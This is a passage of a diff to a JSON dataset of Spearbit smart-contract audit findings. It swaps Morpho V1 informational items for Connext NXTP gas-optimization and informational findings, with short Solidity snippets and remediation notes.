test_BridgeFacet__xcall_localTokenTransferWorksWhenNotAdopted() (gas: -39 (-0.004%)) test_Connext__bridgeSlowLocalShouldWork() (gas: -39 (-0.005%)) test_Connext__zeroValueTransferWithEmptyAssetShouldWork() (gas: -54 (-0.006%)) test_BridgeFacet__xcall_worksIfPreexistingRelayerFee() (gas: -39 (-0.013%)) test_BridgeFacet__xcall_localTokenTransferWorksWithoutAdopted() (gas: -39 (-0.013%)) test_BridgeFacet__xcall_zeroRelayerFeeWorks() (gas: -32 (-0.014%)) test_BridgeFacet__xcall_canonicalTokenTransferWorks() (gas: -39 (-0.014%)) test_LibDiamond__initializeDiamondCut_withZeroAcceptanceDelay_works() (gas: -3812 (-0.015%)) test_BridgeFacet__xcall_zeroValueEmptyAssetWorks() (gas: -54 (-0.034%)) test_BridgeFacet__xcall_worksWithoutValue() (gas: -795 (-0.074%)) test_Connext__zeroValueTransferShouldWork() (gas: -761 (-0.091%)) Overall gas change: -6054 (-0.308%) Note: we need to make sure in future updates the value of _params.normalizedIn == 0 for any invocation of _xcall. Connext: Solved in PR 2511. Spearbit: Verified.", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Informational" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "repayLogic in Compound PositionsManagershould revert if toRepay is equal to zero", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "The current implementation of repayLogic is correctly reverting if _amount == 0 but is not reverting if toRepay == 0. The value inside toRepay is given by the min value between _getUserBorrowBalanceInOf(_- poolToken, _onBehalf) and _amount. If the _onBehalf user has zero debt, toRepay will be initialized with zero.", + "title": "Simplify BridgeFacet._sendMessage by defining _token only when needed", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "In BridgeFacet._sendMessage, _local might be a canonical token that does not necessarily have to follow the IBridgeToken interface. 
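A minimal sketch of defining _token only where it is needed (the exact shape is an assumption; surrounding code elided): if (!_isCanonical) { IBridgeToken _token = IBridgeToken(_local); ... // _token is declared and used only inside this branch }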
That is not an issue, since _token is only used when !_isCanonical; the sketch above simply moves its definition into that branch.", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Informational" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "Differences between Morpho and Compound supply validation logic", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "The Morpho approach is to mimic 1:1 the logic of the underlying protocol, including all the logic and sanity checks that are done before executing a user's action. On top of the protocol's logic, Morpho has its own logic. By reviewing both logic, we have noticed that there are some differences between them; Compound is handling ERC20 tokens that could have transfer fees, Morpho is not doing it right now, see\"ERC20 with transfer's fee are not handled by PositionManager\". Morpho is not checking if the underlying Compound market has been paused for the supply action (see mintGuardianPaused[token]). This means that even if the Compound supply is paused, Morpho could allow users to supply in the P2P. Morpho is not checking if the market on both Morpho and Compound has been deprecated. If the deprecation flag is intended to be true for a market that will be removed in the next future, probably Morpho should not allow users to provide collateral for such a market. More information about detailed information can be found in the discussion topic \"Differences in actions checks between Morpho and Compound\".", + "title": "Using BridgeMessage library in BridgeFacet._sendMessage can be avoided to save gas", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The usage of BridgeMessage library to calculate _tokenId, _action, and finally the formatted message involves lots of unnecessary memory writes, redundant checks, and overall complicates understanding the flow of the codebase. The BridgeMessage.formatMessage(_tokenId, _action) value passed to IOutbox(s.xAppConnectionManager.home()).dispatch is at the end with the current implementation supposed to be: abi.encodePacked( _canonical.domain, _canonical.id, BridgeMessage.Types.Transfer, _amount, _transferId ); Also, it is redundant that the BridgeMessage.Types.Transfer has been passed to dispatch. It does not add any information to the message unless dispatch also accepts other types. This also adds extra gas overhead due to memory consumption both in the origin and destination domains.", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Informational" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "Consider creating a documentation that covers all the Morpho own flags, lending protocol's flags and how they interact/override each other", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "Both Morpho and Aave/Compound have their own flags to check before allowing a user to interact with the protocols. Usually, Morpho has decided to follow the logic to map 1:1 the implementation of the underlying protocol validation. 
There are some examples also where Morpho has decided to override some of their own internal flags For example, in the Aave aave-v2/ExitPositionsManager.liquidateLogic even if a Morpho market has been flagged as \"deprecated\" (user can be liquidated without being insolvent) the liquidator would not be able to liquidate the user if the liquidation logic has been paused.", + "title": "s.aavePool can be cached to save gas in _backLoan", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "s.aavePool can be cached to save gas by only reading once from the storage.", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Informational" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "Missing natspec or typos in natspec", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "- Updated the natspec updateP2PIndexes replacing \"exchangeRatesStored()\" with \"exchangeRate- Stored()\" Updated the natspec _updateP2PIndexes replacing \"exchangeRatesStored()\" with \"exchangeRateStored()\" Updated the natspec for event MarketCreated replacing \"_poolToken\" with \"_p2pIndexCursor\"", + "title": "<= or >= when comparing a constant can be converted to < or > to save gas", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "In this context, we are doing the following comparison: X <= C // or X >= C, where X is a variable and C is a constant expression. But since the right-hand side of <= (or >=) is the constant expression C, we can convert <= into < (or >= into >) to avoid extra opcodes/bytecode being produced by the compiler.", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Informational" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "Removed unused \"named\" return parameters from functions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "Some functions in the codebase are defining \"named\" functions parameter that are not used explicitly inside the code. This could lead to future changes to return wrong values if the \"explicit return\" statement is removed and the function returns the \"default\" values (based on the variable type) of the \"named\" parameter.", + "title": "Use memory's scratch space to calculateCanonicalHash", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "calculateCanonicalHash uses abi.encode to prepare a memory chunk to calculate and return a hash value. Since only 2 words of memory are required to calculate the hash, we can utilize the memory's scratch space [0x00, 0x40) in this regard. Using this approach would avoid paying memory expansion costs, among other things.", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Informational" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "Consider merging the code of CompoundMath libraries and use only one", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "The current codebase uses libraries/CompoundMath.sol but there's already an existing solidity library with the same name inside the package @morpho-dao/morpho-utils For better code clarity, consider merging those two libraries and only importing the one from the external pack- age. 
Be aware that the current implementation inside the @morpho-dao/morpho-utils CompoundMath mul and div function uses low-level yul and should be tested, while the library used right now in the code use \"high level\" solidity. the", + "title": "isLocalOrigin can be optimized by using a named return parameter", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "isLocalOrigin after getting the code size of _token returns a comparison result as a bool: assembly { _codeSize := extcodesize(_token) } return _codeSize != 0; This last comparison can be avoided if we use a named return variable, since the cast to the bool type would automatically do the check for us. Currently, the check/comparison is performed twice under the hood. Note: also see issue \"Use contract.code.length\".", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Informational" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "Consider reverting the creation of a deprecated market in Compound", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "Compound has a mechanism that allows the Governance to set a specific market as \"deprecated\". Once a market is deprecated, all the borrows can be liquidated without checking whether the user is solvent or not. Compound currently allows users to enter (to supply and borrow) a market. In the current version of MorphoGovernance.createMarket, Morpho governance is not checking whether a market is already deprecated on compound before entering it and creating a new Morpho-market. This would allow a Morpho user to possibly supply or borrow on a market that has been already deprecated by compound.", + "title": "The branching decision in AmplificationUtils._getAPrecise can be removed.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "_getAPrecise uses an if/else block to compare a1 to a0. This comparison is unnecessary if we use a simpler formula to return the interpolated value of a.", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Informational" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "Document HeapOrdering", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "Morpho uses a non-standard Heap implementation for their Aave P2P matching engine. The im- plementation only correctly sorts _maxSortedUsers / 2 instead of the expected _maxSortedUsers. Once the _maxSortedUsers is reached, it halves the size of the heap, cutting the last level of leaves of the heap. This is done because a naive implementation that would insert new values at _maxSortedUsers (once the heap is full) and shift them up, then decrease the size to _maxSortedUsers - 1 again, would end up concentrating all new values on the same single path from the leaf to the root node. Cutting off the last level of nodes of the heap is a heuristic to remove low-value nodes (because of the heap property) while at the same time letting new values be shifted up from different leaf locations. 
In the end, the goal this tries to achieve is that more high-value nodes are stored in the heap and can be used for the matching engine.", + "title": "Optimize increment in insert()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The increment of tree.count in function insert() can be optimized. function insert(Tree storage tree, bytes32 node) internal returns (uint256) { uint256 size = tree.count + 1; ... tree.count = size; ... }", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Informational" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "Consider removing the Aave-v2 reward management logic if it is not used anymore", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "If the current aave-v2 reward program has ended and the Aave protocol is not re-introducing it anytime soon (if not at all) consider removing the code that currently is handling all the logic behind claiming rewards from the Aave lending pool for the supplied/borrow assets. Removing that code would make the codebase cleaner, reduce the attack surface and possibly revert in case some of the state variables are incorrectly miss configured (rewards management on Morpho is activated but Aave is not distributing rewards anymore).", + "title": "Optimize calculation in loop of dequeueVerified", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The function dequeueVerified() can be optimized in the following way: (block.number - commitBlock >= delay) is the same as (block.number - delay >= commitBlock), and block.number - delay is constant, so it can be calculated outside of the loop. Also (x >= y) can be replaced by (!(x < y)) or (!(y > x)) to save some gas. function dequeueVerified(Queue storage queue, uint256 delay) internal returns (bytes32[] memory) { ... for (last; last >= first; ) { uint256 commitBlock = queue.commitBlock[last]; if (block.number - commitBlock >= delay) { ... } } }", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Informational" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "Avoid shadowing state variables", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "Shadowing state or global variables could lead to potential bugs if the developer does not treat them carefully. To avoid any possible problem, every local variable should avoid shadowing a state or global variable name.", + "title": "Cache array length for loops", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Fetching array length for each iteration generally consumes more gas compared to caching it in a variable.", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Informational aave-" + "ConnextNxtp", + "Severity: Gas Optimization Diamond.sol#L35, Multicall.sol#L16, StableSwap.sol#L90, LibDi-" ] }, { - "title": "Governance setter functions do not check current state before updates", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "In MorphoGovernance.sol, many of the setter functions allow the state to be changed even if it is already set to the passed-in argument. 
For example, when calling setP2PDisabled, there are no checks to see if the _poolToken is already disabled, or does not allow unnecessary state changes.", + "title": "Use custom errors instead of encoding the error message", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "TypedMemView.sol replicates the functionality provided by custom errors with arguments: (, uint256 g) = encodeHex(uint256(typeOf(memView))); (, uint256 e) = encodeHex(uint256(_expected)); string memory err = string( abi.encodePacked(\"Type assertion failed. Got 0x\", uint80(g), \". Expected 0x\", uint80(e)) ); revert(err); encodeHex() is only used to encode a variable for an error message.", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Informational" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "Emit event for amount of dust used to cover withdrawals", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "Consider emitting an event that includes the amount of dust that was covered by the contract balance. A couple of ways this could be used: Trigger an alert whenever it exceeds a certain threshold so you can inspect it, and pause if a bug is found or a threshold is exceeded. Use this value as part of your overall balance accounting to verify everything adds up.", + "title": "Avoid OR with a zero variable", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "A boolean OR operation with a zero variable is a no-op. The highlighted code above performs a boolean OR operation with a zero variable, which can be avoided: newView := or(newView, shr(40, shl(40, memView))) ... newView := shl(96, or(newView, _type)) // insert type ... _encoded |= _nibbleHex(_byte >> 4); // top 4 bits", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Informational" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "Break up long functions into smaller composable functions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "A few functions are 100+ lines of code which makes it more challenging to initially grasp what the function is doing. You should consider breaking these up into smaller functions which would make it easier to grasp the logic of the function, while also enabling you to easily unit test the smaller functions.", + "title": "Use scratch space instead of free memory", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Memory slots 0x00 and 0x20 are scratch space. So any operation in assembly that needs at most 64 bytes of memory to write temporary data can use scratch space. Functions sha2(), hash160() and hash256() use free memory to write the intermediate hash values. The scratch space can be used here since these values fit in 32 bytes. It saves gas spent on reading the free memory pointer, and memory expansion.", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Informational" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "Remove unused struct members", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "The HealthFactorVars struct contains three attributes, but only the userMarkets attribute is ever set or used. 
These should be removed to increase code readability.", + "title": "Redundant checks in _processMessageFromRoot() of PolygonSpokeConnector", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The function _processMessageFromRoot() of PolygonSpokeConnector does two checks on sender, which are the same: PolygonSpokeConnector.sol#L78-L82, validateSender(sender) checks sender == fxRootTunnel _setMirrorConnector() and setFxRootTunnel() set fxRootTunnel = _mirrorConnector and mirrorConnector = _mirrorConnector require(sender == mirrorConnector, ...) checks sender == mirrorConnector which is the same as sender == fxRootTunnel. Note: the require in _setMirrorConnector() makes sure the values can't be updated later on. So one of the checks in function _processMessageFromRoot() could be removed to save some gas and to make the code easier to understand. contract PolygonSpokeConnector is SpokeConnector, FxBaseChildTunnel { function _processMessageFromRoot(..., address sender, ...) ... validateSender(sender) { ... require(sender == mirrorConnector, \"!sender\"); ... } function _setMirrorConnector(address _mirrorConnector) internal override { require(fxRootTunnel == address(0x0), ...); setFxRootTunnel(_mirrorConnector); } } abstract contract FxBaseChildTunnel is IFxMessageProcessor { function setFxRootTunnel(address _fxRootTunnel) public virtual { ... fxRootTunnel = _fxRootTunnel; // == _mirrorConnector } modifier validateSender(address sender) { require(sender == fxRootTunnel, ...); _; } }", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Informational" + "ConnextNxtp", + "Severity: Gas Optimization PolygonSpokeConnector.sol#L61-L74," ] }, { - "title": "Remove unused struct", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "There is an unused struct BorrowAllowedVars. This should be removed to improve code readability.", + "title": "Consider using bitmaps in _recordOutputAsSpent() of ArbitrumHubConnector", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The function _recordOutputAsSpent() stores status via a mapping of booleans. However the equivalent function recordOutputAsSpent() of Arbitrum Nitro uses a mapping of bitmaps to store the status. Doing this saves gas. Note: this saving is possible because the index values are neatly ordered. function _recordOutputAsSpent(..., uint256 _index, ...) ... { ... require(!processed[_index], \"spent\"); ... processed[_index] = true; } Arbitrum version: function recordOutputAsSpent(..., uint256 index, ... ) ... { ... (uint256 spentIndex, uint256 bitOffset, bytes32 replay) = _calcSpentIndexOffset(index); if (_isSpent(bitOffset, replay)) revert AlreadySpent(index); spent[spentIndex] = (replay | bytes32(1 << bitOffset)); }", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Informational" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "No validation check on prices fetched from the oracle", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "Currently in the liquidateLogic function when fetching the borrowedTokenPrice and collateral- Price from the oracle, the return value is not validated. 
This is due to the fact that the underlying protocol does not do this check either, but the fact that the underlying protocol does not do validation should not deter Morpho from performing validation checks on prices fetched from oracles. Also, this check is done in the Compound PositionsManager.sol here so for code consistency, it should also be done in Aave-v2.", + "title": "Move nonReentrant from process() to proveAndProcess()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The function process() has a nonReentrant modifier. The function process() is also internal and is only called from proveAndProcess(), so it is also possible to move the nonReentrant modifier to function proveAndProcess(). This would save repeatedly setting and unsetting the status of nonReentrant, which saves gas. function proveAndProcess(...) ... { ... for (uint32 i = 0; i < _proofs.length; ) { process(_proofs[i].message); unchecked { ++i; } } } function process(bytes memory _message) internal nonReentrant returns (bool _success) { ... }", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Informational" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "onBehalf argument can be set as the Morpho protocols address", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "When calling the supplyLogic function, currently the _onBehalf argument allows a user to supply funds on behalf of the Morpho protocol itself. While this does not seem exploitable, it can still be a cause for user error and should not be allowed.", + "title": "OpenZeppelin libraries IERC20Permit and EIP712 are final", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The OpenZeppelin libraries have changed IERC20Permit and EIP712 to a final version, so the final versions can be used. OZERC20.sol import \"@openzeppelin/contracts/token/ERC20/extensions/draft-IERC20Permit.sol\"; import {EIP712} from \"@openzeppelin/contracts/utils/cryptography/draft-EIP712.sol\"; draft-IERC20Permit.sol // EIP-2612 is Final as of 2022-11-01. This file is deprecated. import \"./IERC20Permit.sol\"; draft-EIP712.sol // EIP-712 is Final as of 2022-08-11. This file is deprecated. import \"./EIP712.sol\";", "labels": [ "Spearbit", - "MorphoV1", + "ConnextNxtp", "Severity: Informational" ] }, { - "title": "maxSortedUsers has no upper bounds validation and is not the same in Compound/Aave-2", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "In MorphoGovernance.sol, the maxSortedUsers function has no upper bounds limit put in place. The maxSortedUsers is the number of users to sort in the data structure. Also, while this function has the MaxSorte- dUsersCannotBeZero() check in Aave-v2, the Compound version is missing this same error check.", + "title": "Use Foundry's multi-chain tests", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Foundry supports multi-chain testing that can be useful to catch bugs earlier in the development process. A local multi-chain environment can be used to test many scenarios not possible on test chains or in production. 
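A minimal sketch of such a test (the fork aliases, contract and function names are assumptions, not from the report): import \"forge-std/Test.sol\"; contract ConnectorForkTest is Test { uint256 originFork; uint256 destinationFork; function setUp() public { originFork = vm.createFork(\"mainnet\"); destinationFork = vm.createFork(\"optimism\"); } function testMessageAcrossForks() public { vm.selectFork(originFork); // ... dispatch a message through the origin connector vm.selectFork(destinationFork); // ... assert the mirror connector processes it } }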
Since Connectors are a critical part of the NXTP protocol, they would particularly benefit from such tests.", "labels": [ "Spearbit", - "MorphoV1", + "ConnextNxtp", "Severity: Informational" ] }, { - "title": "Consider adding the compound revert error code inside Morpho custom error to better track the revert reason", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "On Compound, when an error condition occurs, usually (except in extreme cases) the transaction is not reverted, and instead an error code (code !== 0) is returned. Morpho correctly reverts with a custom error when this happens, but is not reporting the error code returned by Compound. By tracking, as an event parameter, the error code, Morpho could better monitor when and why interactions with Compound are failing.", + "title": "Risk of chain split", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Domains are considered immutable (unless implementation contracts are redeployed). In case of chain splits, both the forks will continue having the same domain and the recipients won't be able to differentiate the source chain of the message.", "labels": [ "Spearbit", - "MorphoV1", + "ConnextNxtp", "Severity: Informational" ] }, { - "title": "liquidationThreshold variable name can be misleading", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "The liquidationThreshold name in Aave is a percentage. The values.liquidationThreshold variable used in Morpho's _getUserHealthFactor is in \"value units\" like debt: values.liquidationThreshold = assetCollateralValue.percentMul(assetData.liquidationThreshold);.", + "title": "Use zkSync's custom compiler for compiling and (integration) testing", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The protocol needs to be deployed on zkSync. For deployment, the contracts would need to be compiled with zkSync's custom compiler. The bytecode generated by the custom Solidity compiler is quite different compared to the original compiler. One thing to note is that cryptographic functions in Solidity are being replaced/inlined to static calls to zkSync's set of system precompile contracts.", "labels": [ "Spearbit", - "MorphoV1", + "ConnextNxtp", "Severity: Informational" ] }, { - "title": "Users can be liquidated on Morpho at any time when the deprecation flag is set by governance", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "Governance can set a deprecation flag on Compound and Aave markets, and users on this mar- ket can be liquidated by anyone even if they're sufficiently over-collateralized. Note that this deprecation flag is independent of Compound's own deprecation flags and can be applied to any market.", + "title": "Shared logic in SwapUtilsExternal and SwapUtils can be consolidated or their changes would need to be synched.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The SwapUtilsExternal library and SwapUtils share quite a lot of function (and event) logic. 
The main differences are: SwapUtilsExternal.swap does not have the following check but SwapUtils.swap does: // File: connext/libraries/SwapUtils.sol#L715 require(dx == tokenFrom.balanceOf(address(this)) - beforeBalance, \"no fee token support\"); This is actually one of the big/important diffs between current SwapUtils and SwapUtilsExternal. Other differences are: Some functions are internal in SwapUtils, but they are external/public in SwapUtilsExternal. AmplificationUtils is basically copied in SwapUtilsExternal and its functions have been made external. SwapUtilsExternal does not implement exists. SwapUtilsExternal does not implement swapInternal. The SwapUtils's Swap struct has an extra field key as do the events in this file. Some inconsistent formatting.", "labels": [ "Spearbit", - "MorphoV1", + "ConnextNxtp", "Severity: Informational" ] }, { - "title": "Refactor _computeP2PIndexes to use InterestRateModel's functions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "The InterestRatesManager contracts' _computeP2PIndexes functions currently reimplement the interest rate model from the InterestRatesModel functions.", + "title": "Document why < 3s was chosen as the timestamp deviation cap for price reporting in setDirectPrice", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "setDirectPrice uses the following require statement to filter direct price reports by the owner. require(_timestamp - block.timestamp < 3, \"in future\"); Only prices with _timestamp within 3s of the current block timestamp are allowed to be registered.", "labels": [ "Spearbit", - "MorphoV1", + "ConnextNxtp", "Severity: Informational" ] }, { - "title": "Permitting Multiple Drip Calls Per Block", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "state.config.interval is 0. We are currently unaware of use cases where this is desirable. The inline comments correctly note that reentrancy is possible and permitted when Reentrancy is one risk, flashbot bundles are a similar risk where the drip may be called multiple times by the same actor in a single block. A malicious actor may abuse this ability, especially if interval is misconfigured as 0 due to JavaScript type coercion. A reentrant call or flashbot bundle may be used to frontrun an owner attempting to archive a drip or attempting to withdraw assets.", + "title": "Document what IConnectorManager entities would be passed to BridgeFacet", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Document what type of IConnectorManager implementations would the owner or an admin set for the s.xAppConnectionManager. The only examples in the codebase are SpokeConnectors.", "labels": [ "Spearbit", - "OptimismDrippie", - "Severity: Medium Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Version Bump to Latest", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "During the review, a new version of solidity was released with an important bugfix.", + "title": "Second nonReentrant modifier", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "A previous version of xcall() had a nonReentrant modifier. 
This modifier was removed to enable execute() to call xcall() to return data to the originator chain. To keep a large part of the original protection it is also possible to use a separate nonReentrant modifier (which uses a different storage variable) for xcall()/xcallIntoLocal(). This way both execute and xcall()/xcallIntoLocal() can be called once at the most. function xcall(...) ... { } function xcallIntoLocal(...) ... { } function execute(ExecuteArgs calldata _args) external nonReentrant whenNotPaused returns (bytes32) { }", "labels": [ "Spearbit", - "OptimismDrippie", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "DOS from External Calls in Drippie.executable / Drippie.drip", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "In both the executable and drip (which also calls executable) functions, the Drippie contract interacts with some external contract via low-level calls. The external call could revert or fail with an Out of Gas exception causing the entire drip to fail. The severity is low beacuse in the case where a drip reverts due to a misconfigured or malicious dripcheck or target, the drip can still be archived and a new one can be created by the owner.", + "title": "Return 0 in swapToLocalAssetIfNeeded()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The return in function swapToLocalAssetIfNeeded() could also return 0, which is somewhat more readable and could save some gas. Note: after studying the compiler output it might not actually save gas. function swapToLocalAssetIfNeeded(...) ... { if (_amount == 0) { return _amount; } ... }", "labels": [ "Spearbit", - "OptimismDrippie", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Use call.value over transfer in withdrawETH", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "transfer is no longer recommended as a default due to unpredictable gas cost changes in future evm hard forks (see here for more background.) While useful to use transfer in some cases (such as sending to EOA or contract which does not process data in the fallback or receiver functions), this particular contract does not benefit: withdrawETH is already owner gated and is not at risk of reentrancy as owner already has permission to drain the contracts ether in a single call should they choose.", + "title": "Use contract.code.length", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Retrieving the size of a contract is done in assembly, with extcodesize(). This can also be done in Solidity, which is more readable. Note: assembly might be a bit more gas efficient, especially if optimized even further: see issue \"isLocalOrigin can be optimized by using a named return parameter\". LibDiamond.sol function enforceHasContractCode(address _contract, string memory _errorMessage) internal view { uint256 contractSize; assembly { contractSize := extcodesize(_contract) } require(contractSize != 0, _errorMessage); } AssetLogic.sol function isLocalOrigin(address _token, AppStorage storage s) internal view returns (bool) { ... 
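// (illustrative comment, not in the original source: per this finding, the assembly below could simply be replaced by `return _token.code.length != 0;`)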
uint256 _codeSize; // solhint-disable-next-line no-inline-assembly assembly { _codeSize := extcodesize(_token) } return _codeSize != 0; }", "labels": [ "Spearbit", - "OptimismDrippie", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Input Validation Checks for Drippie.create", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "Drippie.create does not validate input potentially leading to unintended results. The function should check: _name is not an empty string to avoid creating drip that would be able to read on frontend UI. _config.dripcheck should not be address(0) otherwise executable will always revert. _config.actions.length should be at least one (_config.actions.length > 0) to prevent creating drips that do nothing when executed. DripAction.target should not be address(0) to prevent burning ETH or interacting with the zero address during drips execution.", + "title": "cap and liquidity tokens", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The function addLiquidity() also adds tokens 